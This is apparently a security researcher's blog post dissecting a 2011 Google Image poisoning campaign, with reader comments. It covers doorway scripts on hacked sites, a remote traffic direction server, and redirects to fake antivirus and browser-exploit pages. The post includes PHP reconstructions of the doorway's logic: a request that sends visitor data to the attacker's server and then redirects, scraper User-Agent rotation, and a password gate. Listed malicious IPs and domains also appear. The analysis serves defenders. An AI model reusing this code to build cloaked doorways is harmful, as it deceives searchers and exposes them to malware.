
Google Image Poisoning. What’s New in June?

   29 Jun 11   Filed in Website exploits

This is the second (more techie) part in a series of posts about a new wave of the Google Image poisoning attack. It heavily references the detailed description of the attack that I posted back in May. Most of that description still holds, so I will only cover the changes here. If you want the complete picture, I suggest you read the original description first.

Changed doorway behavior

After May 18th, I noticed that doorway pages no longer redirected me anywhere when I clicked on poisoned search results. Neither to bad sites nor to home pages of compromised sites. Instead they displayed the spammy content generated for search engine crawlers only.

That was strange: it could never have happened if the old algorithm were still in use.

Then I checked the cache directories (./.log/compromiseddomain.com/) and found new maintenance files there: don.txt and xml.txt. The don.txt file contained the HTML template for spammy pages and replaced the shab100500.txt file used by the original algorithm. The xml.txt file contained the following string: bG92ZS1ibG9nY29tLm5ldA==, which decodes (base64) to “love-blogcom.net“. Clearly, it was a more secure replacement for xmlrpc.txt, which stored the domain name of a remote malicious server in plain text.
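If you want to check such a string yourself, a one-liner is enough (PHP, since the doorway script itself is PHP):

<?php echo base64_decode('bG92ZS1ibG9nY29tLm5ldA=='); // prints: love-blogcom.net ?>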

A few days later, the xml.txt file was replaced by xml.cgi, which was a clever step since .cgi files produce server errors when you try to open them in directories that aren’t configured to execute CGI scripts.

So I knew that the doorway script had been updated, but I couldn’t understand why the doorways exhibited no malicious behavior when I clicked on hijacked image search results. That didn’t make much sense. What was the purpose of showing those spammy, unintelligible pages without trying to monetize the traffic? The only plausible idea was that they were playing the “long game”: they needed some time to have the new pages rank well without the risk of being identified as cloaked or malicious content, and once many pages reached prominent positions in search results, they would start redirecting web searchers to bad sites. Well, that was a working hypothesis until I got the source code of the new doorway script. The reality is that crooks don’t play “long games” if they can monetize right away – the new doorway pages did redirect to bad sites, but my virtual environment wasn’t properly configured to trigger the redirects.

Dissecting the updated Google Image poisoning attack

So let me tell you what exactly has changed in this script and how those changes affect web searchers and Google.

The file is similarly obfuscated:

<?php print(gzuncompress(base64_decode('eNqNWG1v4kYQ/.../AW9Zhls='))); ?>
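To study such a file safely, you can decode the payload without executing it. A minimal sketch (the '...' placeholder stands for the complete base64 blob from the infected file):

<?php
// Write the decoded doorway source to a file for inspection instead of running it.
$blob = 'eNqNWG1v4kYQ/.../AW9Zhls='; // paste the complete base64 string from the infected file here
file_put_contents('decoded_doorway.txt', gzuncompress(base64_decode($blob)));
?>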

and the overall algorithm looks pretty much the same. But when you look into the details, you’ll soon see the key changes.

Google is the only target

While the previous version targeted visitors from Google, Yahoo and Bing:

if ( strpos( $_SERVER["HTTP_REFERER"], "google." ) || strpos( $_SERVER["HTTP_REFERER"], "yahoo." ) || strpos( $_SERVER["HTTP_REFERER"], "bing." ) > 0 ) {...

the new version is only interested in visitors from Google:

if ( strpos( $_SERVER["HTTP_REFERER"], "google." ) > 0 ) {...

It looks like traffic from Yahoo and Bing is so negligible that it isn’t worth the effort.

New redirection system

Now, here is the answer to why I couldn’t trigger the malicious redirects.

In the previous version, to trigger the redirect it was enough to be a human visitor (not a known bot) coming from a major search engine, with a search query that didn’t contain the “site:” operator. There was a fixed redirect script in the iog.txt file that changed roughly every 30 minutes, and within that window all visitors were redirected to the same intermediate traffic direction system (TDS) server.

The new redirect mechanism is more flexible and sophisticated:

Built-in TDS functionality

If the request looks eligible (it comes from Google and the search query doesn’t contain the “site:” operator), the script tries to obtain a redirect URL from a remote server. That remote server decides in real time whether that particular visitor should be redirected, and where.

The domain name of that remote server is stored as a base64-encoded string in the xml.cgi file. By default, it is mydiarycom.net (base64:bXlkaWFyeWNvbS5uZXQ=).

The request for the redirect URL goes to hxxp://mydiarycom.net/out/stat.cgi?parameter=… . In its parameters, it passes all the pertinent information about the visitor and the doorway site (see the sketch after this list):

  • the domain name of the doorway site
  • the full URL of this doorway script (there may be several scripts on the same server)
  • the visitor’s IP address
  • the referring URL (in this case Google search URL)
  • the User-Agent string of the visitor’s browser
  • the search query that was used on Google to find this doorway
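Here is a hypothetical PHP sketch of how the doorway could assemble such a request. The parameter names and helper details are my assumptions; only the data points listed above are documented:

<?php
// Hypothetical reconstruction; the parameter names are assumptions, not from the actual script.
$server = base64_decode(trim(file_get_contents(dirname(__FILE__) . '/xml.cgi'))); // e.g. "mydiarycom.net"
parse_str((string) parse_url($_SERVER['HTTP_REFERER'], PHP_URL_QUERY), $ref);     // extract the Google search query
$params = array(
    'domain' => $_SERVER['HTTP_HOST'],             // domain name of the doorway site
    'script' => $_SERVER['REQUEST_URI'],           // full URL of this doorway script
    'ip'     => $_SERVER['REMOTE_ADDR'],           // visitor's IP address
    'ref'    => $_SERVER['HTTP_REFERER'],          // referring Google search URL
    'ua'     => $_SERVER['HTTP_USER_AGENT'],       // User-Agent string of the visitor's browser
    'query'  => isset($ref['q']) ? $ref['q'] : '', // search query used on Google to find this doorway
);
$redirect = trim((string) @file_get_contents('http://' . $server . '/out/stat.cgi?' . http_build_query($params)));
if ($redirect !== '') {               // the remote TDS decided this visitor should be redirected
    header('Location: ' . $redirect);
    exit;
}
// otherwise fall through and display the spammy doorway page
?>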

It is easy to see the benefits of this new approach.

It allows the attackers to collect important statistics on the mydiarycom.net server. For example, now they can see what search queries people use to find doorway pages (previously they could only guess, based on URLs of referring doorway pages, which were rarely exact matches of the Google searches).

More importantly, they now have a centralized system that manages redirects across all doorway sites. No need to update iog.txt files on each site. No need to update the whole script if they decide to change something (e.g. blacklist some IP addresses or redirect visitors to country-specific landing pages).

Dependency on IP address and User-Agent

The most important parameters that affect the redirect URLs are the visitor’s IP address and User-Agent string. I tested several dozen combinations of various IPs and UAs. At this point, mydiarycom.net has three types of response that break traffic into three major categories (a sketch of the apparent decision logic follows the breakdown below):

  1. Mac traffic
  2. PC traffic
  3. Unwanted traffic

1. Redirect to a fake Mac antivirus site (e.g. “Apple security center”). – For all visitors whose web browsers have “Macintosh” in their User-Agent strings.

The typical redirect URL looks like this:

hxxp://89 .149 .226 .210/r/7073b499d369ec84a9cf110af621946c7bbbec33005b3e13

The IP address of the server and the string after /r/ change regularly. I’ve seen the following IPs in the fake Mac AV URLs:

  • 178.162.157.199 (Belize, Belmopan Netdirect 178.0.0.0 – 178.255.255.255)
  • 178.162.173.44 (Belize, Belmopan Netdirect 178.0.0.0 – 178.255.255.255)
  • 184.82.190.247 (United States, Network Operations Center Inc 184.0.0.0 – 184.255.255.255)
  • 188.72.248.140 (Belize, Belmopan Netdirect 188.0.0.0 – 188.255.255.255)
  • 212.124.107.190 (United States, Amsterdam Mnogobyte Llc 212.124.107.0 – 212.124.107.255)
  • 212.124.123.180 (United States, Amsterdam Mnogobyte Llc 212.124.120.0 – 212.124.123.255)
  • 212.124.123.182 (United States, Amsterdam Mnogobyte Llc 212.124.120.0 – 212.124.123.255)
  • 212.95.55.96 (Hong Kong, Netdirect 212.95.55.0 – 212.95.55.255)
  • 78.159.122.140 (Hong Kong, Netdirect 78.0.0.0 – 78.255.255.255)
  • 78.159.122.23 (Hong Kong, Netdirect 78.0.0.0 – 78.255.255.255)
  • 80.86.81.27 (Germany, Intergenia Ag 80.86.81.0 – 80.86.81.255)
  • 82.146.47.167 (Russian Federation, Ispsystem Cjsc 82.146.40.0 – 82.146.47.255)
  • 89.149.226.210 (Germany Netdirect 89.149.226.0 – 89.149.227.255)
  • 91.213.117.213 (Ukraine, Safe Service Xxi (mhost Dc) 91.213.117.0 – 91.213.117.255)
  • 91.226.212.64 (Ukraine, Pe Ivanov Vitaliy Sergeevich 91.226.212.0 – 91.226.213.255)
  • 95.158.185.67 (Bulgaria Novatel Eood 95.0.0.0 – 95.255.255.255)

2.1 Redirect to a general browser exploit site. – For visitors on non-Mac computers that use browsers other than Chrome.

The typical URL looks like this:

hxxp://rljdxskunks .info/index.php?tp=81350e0ebb536599

Again, the domain name and the tp parameter change regularly (roughly every 30 minutes). Here are some more domains of exploit pages:

  • xdasmeandered .info – 209.85.147.105 (California – Mountain View – Google Inc)
  • artfitful .info – 209.85.147.105
  • fitfuldot .info – 209.85.147.105
  • bestinstitutionally .info – 209.85.147.105
  • yrsimeandered .info – 209.85.147.105
  • rljdxskunks .info – 109.230.246.226 (Germany, Marcel Edler Trading As Optimate-server)
  • arcskunks .info – 109.230.246.226
  • bhelskunks .info – 109.230.246.226
  • fzfjjskunks .info – 109.230.246.226
  • hzoyoskunks .info – 109.230.246.226

2.2. Alternatively, non-Mac computers (including Chrome browsers) are redirected to a fake PC antivirus site (e.g. “Windows Security 2011”)

hxxp://fwhzimpluck .info/fast-scan/

  • hpluck .info – 95.64.48.132 (Romania, Netserv Consult Srl)
  • confuseps .info
  • wbfiibpluck .info
  • osyqdhinequitable .info
  • pluckypu .info
  • canadianizeajvfil .info
  • canadianizex .info
  • upgncanadianize .info
  • canadianizevd .info

3. Nothing returned (no redirect is issued; the spammy page is displayed instead)

  • for known search engine bots (based on IP and UA)
  • for visitors who use Google Chrome (only when the exploit vector is active)
  • for visitors from Russia, Ukraine and Belarus who don’t use Macs.
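Putting the observed responses together, the server-side decision logic appears to work roughly like this. This is a hypothetical reconstruction based purely on my tests; the function name and the geo-IP lookup are assumptions:

<?php
// Hypothetical reconstruction of the mydiarycom.net TDS logic, based only on observed responses.
// $ua is the User-Agent string; $country is a two-letter code from some geo-IP lookup (assumed).
function classify_visitor($ua, $country, $is_known_bot) {
    if ($is_known_bot) return 'none';                                // 3. known search engine bots (by IP and UA)
    if (strpos($ua, 'Macintosh') !== false) return 'mac-fakeav';     // 1. Mac traffic: fake "Apple security center"
    if (in_array($country, array('RU', 'UA', 'BY'))) return 'none';  // 3. non-Mac traffic from Russia/Ukraine/Belarus
    if (strpos($ua, 'Chrome') !== false) return 'pc-fakeav';         // 2.2/3. Chrome: fake AV or nothing, never the exploit
    return 'pc-exploit';                                             // 2.1. other PC browsers: browser exploit site
}
?>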

Interesting sidenotes

ex-USSR traffic

I originally couldn’t trigger the redirect because I used an Internet Explorer UA along with a Russian IP address. Now I can see that the attackers are simply not interested in Russian non-Mac traffic; this traffic is probably hard to monetize. On the other hand, Mac owners in Russia tend to be quite wealthy people who have credit cards and can easily afford to pay $50-100 (and many of them can read English).

At the same time, traffic from other countries with low purchasing power (e.g. Turkey, China, Romania) is treated no differently than traffic from the United States or the European Union. This also suggests that the attackers are originally from the former Soviet Union.

Google Chrome

Google Chrome seems to be immune to the exploit that is currently used for non-Mac visitors.

Malware on Google’s server?

You might have noticed that many exploit sites (e.g. fitfuldot .info) were hosted on a server with the IP address 209.85.147.105. The irony is that this address belongs to Google. The domain names no longer resolve, but you can see the historical records on DomainTools.com. For example, check the record for fitfuldot .info and click on the “Server Stats” tab: you will see that the server belongs to “California – Mountain View – Google Inc” and has the gws (Google Web Server) type. And if you check more information for that IP address, you’ll see that “281 websites use this address. (examples: abroaddomain .info abroadhosting .info abroadsmart .info abroadsoft .info)” – they all belong to the same attack.

And if you check the Safe Browsing diagnostic page for osyqdhinequitable .info (a fake AV site), you’ll see that at some point it was hosted on the AS15169 (Google Internet Backbone) network.

Now that the malicious domains have been shut down (their name servers currently read as NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM), if you navigate your browser to http://209.85.147.105/ you’ll see a real Google home page.

Any ideas how hackers managed to use Google’s own server?

Update (June 29, 2011): Some readers note that Google might have simply sinkholed those malicious domains. Good point! Indeed, I don’t actually remember when I resolved those domain names, as the whole investigation took several weeks. I probably did it a few days after I checked the malicious content on those domains (I wish I had checked the HTTP headers back then!). And the NS(1|2).SUSPENDED-FOR.SPAM-AND-ABUSE.COM name servers suggest that the current IP address is different from the original one. Either way, I didn’t think that Google’s server was hacked. I thought this could be some service that allowed creating websites on Google’s infrastructure (e.g. Google Sites, Google App Engine, or something like that; hardly anyone can remember them all ;-) What do you think?

Other changes and observations.

Rotating User-Agent.

In the doorway script, the internal function that downloads search results from Google (they are used to compose spammy pages) now randomly rotates three different User-Agent strings. This way the script tries to prevent its requests to Google from being detected as automated.
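A minimal sketch of this technique (the three UA strings below are illustrative placeholders, not the ones from the actual script):

<?php
// Rotate User-Agent strings for scraping requests (placeholder UAs, not from the real script).
$user_agents = array(
    'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30',
    'Opera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10',
);
$ua   = $user_agents[array_rand($user_agents)]; // pick a random UA for each request
$ctx  = stream_context_create(array('http' => array('header' => 'User-Agent: ' . $ua . "\r\n")));
$serp = @file_get_contents('http://www.google.com/search?q=' . urlencode('some keyword'), false, $ctx);
?>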

Password-protected

The maintenance requests to the script are now password-protected. To be able to change the xml.cgi file (with the domain name of the remote server) and to use the file uploader, you now need to provide a password in the “name” parameter of a POST request. The MD5 value of that password must be equal to “42a3f0678d1bbb517272142f5b3df3cd” (any ideas what the password is?).
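The check itself is trivial. A sketch of the gate (the hash is taken from the actual script; everything else here is illustrative):

<?php
// Maintenance gate: the MD5 of the POSTed "name" parameter must match the hard-coded hash.
if (isset($_POST['name']) && md5($_POST['name']) === '42a3f0678d1bbb517272142f5b3df3cd') {
    // password accepted: allow updating xml.cgi, uploading files, etc.
} else {
    // wrong or missing password: behave like a normal doorway page
}
?>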

This way they can protect their doorways from other parties who might want to hijack them and redirect the traffic to third-party sites. In the previous version, anyone who knew the algorithm (for example, from reading my blog post) could easily upload files to compromised sites.

To have Google discover the doorway pages on hacked sites, cybercriminals create link pages on free sites, usually free hosted blogging services like blog.fc2.com. They create hundreds of blogs and regularly publish posts that consist of hundreds of links to doorway pages.

Spam on Ning.com

I’ve found an interesting variation of this approach lately. Instead of creating new blogs, they register with existing Ning.com communities and post spammy comments and blogposts there. Again, each post consists of hundreds of links to doorway pages and to similar spammy posts on other Ning.com sites. (I found 700+ ning sites with the spammy link pages)

Such rogue ning.com users usually have unintelligible names like “cfulahlz” or “yflcypzt“. Sometimes they are registered as males, sometimes as females. However, it is easy to spot such users as they always specify “Wiggins, CO, United States” as their location. The following Google search can help reveal hundreds of such rogue users: [site:ning.com "Wiggins, CO"]

“Sitemap” links

At some point, the linking scheme also included compromised sites where hackers injected cloaked spammy links (visible only if you pretend to be a Googlebot). Interestingly, I’ve found 115 such hacked sites, and they are all hosted on 10 IP addresses that belong to 4 different hosting providers (according to DomainTools.com): Liquid Web Inc, Tailor Made Servers, Hostmysite and Nashua Goldenware. When I checked other sites on the same IPs, they were all similarly hacked. This fact suggests that whole servers were hacked rather than individual sites.

Fortunately, those servers seem to have been cleaned up a few days ago, but you can still see signs of the attack in Google’s search results for ["Sitemap 2295 * Sitemap 4008 * Sitemap 2960"] – and for some results you can still see cached pages with links to spammy “sitemaps”.

Can Google efficiently blacklist doorway sites?

Once I revealed the linking schemes, it was quite easy to compile a list of 10,000+ unique compromised sites with doorway pages.

Screenshot: flagged sites

As I mentioned on June 23rd, Google had a very low detection rate of about 3% for those doorway sites. Earlier that day, I sent my list of then 9,000+ hacked sites along with the decoded doorway script to Google.

Five days later, I’m going through my list again and can now see some improvements. Google seems to be scanning sites from my list in alphabetical order. At this point, I can see that roughly 20% of the domain names that start with digits or with the letter “a” have been blacklisted by Google (which means that only about 700 sites from my list have been processed). The rest of the list (about 10,000 sites) still has the same low percentage (~3%) of flagged sites.

In May, it took significantly less time for Google to flag a hefty portion of all the doorway sites that poisoned Google Image search. Of course, that wave of the black hat SEO attack had a noticeable side effect: the “imgaaa & co” img and iframe tags injected into index pages of hacked sites. So Google only needed to find those tags on infected sites. That worked like a charm and helped them flag over 34,000 sites and mitigate the attack in a very short time.

Unfortunately, this new wave doesn’t have such easily detectable signs, and Google needs to improve their scanners to be able to detect malicious behavior despite all the new countermeasures that hackers invent. At this point, I can see that even after June 23rd Google hasn’t picked up malware on quite a few doorway sites that still redirect visitors to bad sites.

Given these problems with detection, it is important for Google to keep improving the ranking algorithm so that computer-generated doorway pages have very little chance of being displayed on the first pages of search results.

To webmasters

Sites that have been blacklisted after June 23rd mostly have the following non-informative and quite confusing descriptions on their Safe Browsing diagnostic pages:

“Of the 7 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-06-24, and suspicious content was never found on this site within the past 90 days.”

or

“Google has not visited this site within the past 90 days. Suspicious activity was detected over 90 days ago, but no data is available for the past 90 days.”

Note that the pages say either “0 page(s) resulted in malicious software being downloaded and installed” or “no data is available for the past 90 days”. At the same time, no malicious or intermediary domains are mentioned.

It looks like Google’s anti-malware system is not yet properly configured to deal with this sort of problem. I guess that some experimental module is involved in the detection of these malicious doorways, so the lack of details on diagnostic pages and in the “Malware” section of Google Webmaster Tools is understandable.

Meanwhile, if you see such diagnostic pages for your blacklisted sites, consider searching your server for doorway files. For example, I find the [site:example.org] and [site:example.org inurl:page] Google searches very helpful for detecting this problem (replace example.org with your site’s domain name).

If you wonder how hackers managed to break into your site, I can say that I have enough evidence that they used stolen FTP credentials. So, to prevent reinfection, it is important to change all passwords and refrain from saving them in FTP clients.

You can find more information on how to detect this attack and clean up your site in my previous article.


Reader's Comments (3)

1.

    [...] Back in May I posted about WordPress websites distributing malware in Google Image SERP. This research was done by Denis Sinegubko, a malware researcher and the developer of Unmask Parasites, a tool to help you find security vulnerabilities and hidden content on your website. In between putting together another mammoth blog post on Google image poisoning, [...]

2.

Thanks for these articles. I’ve been experiencing somewhat similar attacks, but for me it’s Google search that’s the target.

    Unfortunately, I’m pretty new to security issues of this type — especially in the context of CMSs — and am still uncertain about all the ways the bad guys can get in. Maybe I’ll find a nice list of general doorways, and a recipe of the basics.

    For now, however, I’m curious about your stolen FTP ideas. I’m not stupid enough to think that Macs are immune from malware, but do you know of anything specific on Mac? And do you know if ClamXav (or ClamAV on Windows) will find these? For me, I think that the doorway being exploited has to do with the CMS, since only sites exploited last year with an older CMS have been affected. But I don’t want to ignorantly rule out FTP.

•

      There are actually many similar ongoing search results poisoning campaigns. Not all of them use the FTP vector. Some use security holes in web applications. Sometimes hackers even use internal security flaws of hosting providers to create rogue doorway pages on all websites on compromised servers.

If you have your site’s FTP logs (you can ask your hosting provider for them), you can find out whether someone from unknown IPs logged into your site and uploaded fishy files. And with the web server’s raw access logs, it is usually possible to reveal an attack on your web application.

P.S. I’m not a Mac user and have never tried any of the AV solutions available for Macs. I’ve read a lot about a free Mac antivirus from Sophos, though. I know it detects the new fake AVs for Macs. Not sure about password-stealing malware on Mac. At this point, it’s mainly a PC problem, but Mac malware evolves every day, so who knows.